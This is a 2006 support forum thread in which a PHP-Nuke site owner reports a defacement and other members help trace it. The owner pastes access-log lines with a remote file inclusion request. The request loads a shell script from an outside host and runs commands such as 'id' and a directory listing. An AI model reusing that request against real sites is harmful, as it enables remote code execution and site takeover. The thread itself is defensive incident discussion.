Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
Author Message
LeapingLizard
New Member
New Member


Joined: Dec 11, 2005
Posts: 9

PostPosted: Thu Jun 08, 2006 3:30 pm Reply with quote

Raven,

Hey this is Scott. Been running the security patches you installed for months now and things are going great. No more admin issues etc.. I run Nuke 7.0

Today I'm not sure how they did it because my index.php file is ok, but if you load my site directly typing in Only registered users can see links on this board! Get registered or login! I get a screen that says:

=====================

Hacked By GodSmacK
Only registered users can see links on this board! Get registered or login!

=====================

If I type Only registered users can see links on this board! Get registered or login!

My site loads perfectly as do all the other pages? How are they doing this and how can i correct it? PM me when you get a second.

Thanks,

Scott
 
View user's profile Send private message Send e-mail
gregexp
The Mouse Is Extension Of Arm


Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

PostPosted: Thu Jun 08, 2006 3:43 pm Reply with quote

check to see if there is an index.html

as it will try to find that first

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
LeapingLizard
PostPosted: Thu Jun 08, 2006 3:45 pm Reply with quote

This post is probably in the wrong area for starters and I apologize for that.

Well I kind of figured out what was changed.

My Index.php files are file, but some how they changed my index.html file to this:

Code:
  Can't post the code, but it was changed.


Same questions applies, how did they do that and how can I stop it?

Thanks,

Scott
 
LeapingLizard
PostPosted: Thu Jun 08, 2006 3:46 pm Reply with quote

Yep that was it, but not sure how to keep them out.
 
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Thu Jun 08, 2006 3:47 pm Reply with quote

Do you know if the permissions were set to allow writing? Most likely, they scanned your site to find files that could be overwritten, then used another attack to overwrite the file.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
LeapingLizard
PostPosted: Thu Jun 08, 2006 3:50 pm Reply with quote

I went back to my original back up of my site that i did two days ago and i did not have an index.html file in my back up.

Could they have inserted that?

I deleted that file and site is back on track normally. Weird...
 
kguske
PostPosted: Thu Jun 08, 2006 3:53 pm Reply with quote

Usually not without FTP or control panel access, unless you use a non-standard module that allows uploads.
 
gregexp
PostPosted: Thu Jun 08, 2006 4:13 pm Reply with quote

im not sure how but i think they wrote a php code...fopen ussually does the trick..and wrote to it....do u allow anything uploaded to ur site?
 
LeapingLizard
PostPosted: Thu Jun 08, 2006 4:29 pm Reply with quote

Yes the only thing i allow to be uploaded are the Avatars. Funny this started to happen all of a sudden becasue i just turned on the upload Avatar function.

Do you think that is causing the issue?
 
gregexp
PostPosted: Thu Jun 08, 2006 4:33 pm Reply with quote

im goin to try a hack on mysite to see.
 
LeapingLizard
PostPosted: Thu Jun 08, 2006 4:44 pm Reply with quote

Here is the Log entry that showed up around the time it happened:

Code:
85.106.213.224


Get-Address
/modules/Forums/admin/index.php?phpbb_root_path=http%3A%2F%2Fexploitarsivi.atspace.com%2F030.txt%3Fcmd&act=ls&d=%2Fhome%2Fsweptlin%2Fpublic_html%2F&sort=0a
 
LeapingLizard
PostPosted: Thu Jun 08, 2006 4:52 pm Reply with quote

This is the last entry and looks like this is the one that did it, maybe i shouldn't be posting this...:

Code:
85.106.213.224 


/modules/Forums/admin/index.php?phpbb_root_path=http://exploitarsivi.atspace.com/030.txt?cmd=id



I did go ahead and ban thier IP range.

85.106.128.0 - 85.106.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-alcatel
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ***@telekom.gov.tr
changed: ***@telekom.gov.tr 20051026
source: RIPE
 
gregexp
PostPosted: Thu Jun 08, 2006 5:02 pm Reply with quote

after attempting that on my site...sentinel caught me...with ease and i tried to upload somethin to my avatars that was actually a script renamed but it wouldnt take.

I tried every input on my site...and nothing and i mean nothing would take...now im not very knowledgable on hacks..but i can tell...no1 will input a script that will function into any inputs i got...sorry to say...im at a dead end
 
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Thu Jun 08, 2006 7:02 pm Reply with quote

well this is one of the most common they use...
but its not only towards phpnuke nuke....its targeted to phpbb standalone,postnuke,my-gallery,gallery etc....
 
View user's profile Send private message
bugsTHoR
Involved
Involved


Joined: Apr 05, 2006
Posts: 261

PostPosted: Wed Aug 16, 2006 3:06 pm Reply with quote

is their a way of testing the security myself on my site so i know i cant be hacked anyway at all.

i got 7.6 raven 2.2.2 all updates , its catching alot , but i want all holes filled (not mine lol)

the only add-ons i got installed is shout box 8.5 and doant o meter (not working as yet) and server monitor(game monitor )

_________________
Only registered users can see links on this board! Get registered or login! LUV RAVEN DISTROBUTION BEBE

Clanthemes.com are great (free advertisements for now until i get to 20,000 posts LoL) 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sat Aug 19, 2006 2:11 am Reply with quote

There are lots of vulnerabilities you can search for... we won't post them here.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
bugsTHoR
PostPosted: Sun Aug 20, 2006 5:57 pm Reply with quote

Rgr that evaders99, was`nt asking for the code i got me a hacker and all his codes thx Very Happy since my asking , just to test ..anyways,

i turned off sentinel ...AAhhh i here you shout, well i switched database to one called
catch_memy_hacker , with a 1 month old backup
and all new folders he could play with killing me insert really Evil laugh**

.....It worked he used lots of code thorugh address bar before he could get in, (i will send you the printscreens/codes if ya really want it to see if its something new) only you guys though..he``s No script kiddie me thinks??? i think he knows exactly what he does himself

his IP is 81.76.121.209 which is leeds ..but its only his host IP not his ...how do i get him please? pm me if needed
 
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

PostPosted: Sun Aug 20, 2006 6:42 pm Reply with quote

You need to look closely at the string manipulation he used, you will probably find that he came from site x and connected with site y which is compromised and used that to eventually get to your site.
I'm seeing this more and more often.
Th problem with this type of attack is if you rely solely on the referer, it is going to give you the wrong data (site y in this example).
 
View user's profile Send private message Send e-mail
bugsTHoR
PostPosted: Sun Aug 20, 2006 10:18 pm Reply with quote

rgr that , ibanned this IP, but i want this guy really bad anyway to get catch him at all , ill try anything for testing purposes
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9456
Location: Arizona

PostPosted: Mon Aug 21, 2006 6:47 am Reply with quote

Maybe try adding a string in the string blocker. Problem is, though, they may even just change that as they use someone else's site they have compromised to issue a new attack. It is endless... all that "talent" wasted.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
bugsTHoR
PostPosted: Tue Aug 22, 2006 5:24 pm Reply with quote

well i found out by pure chance that my abuse/abuse.html works lol

Image
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©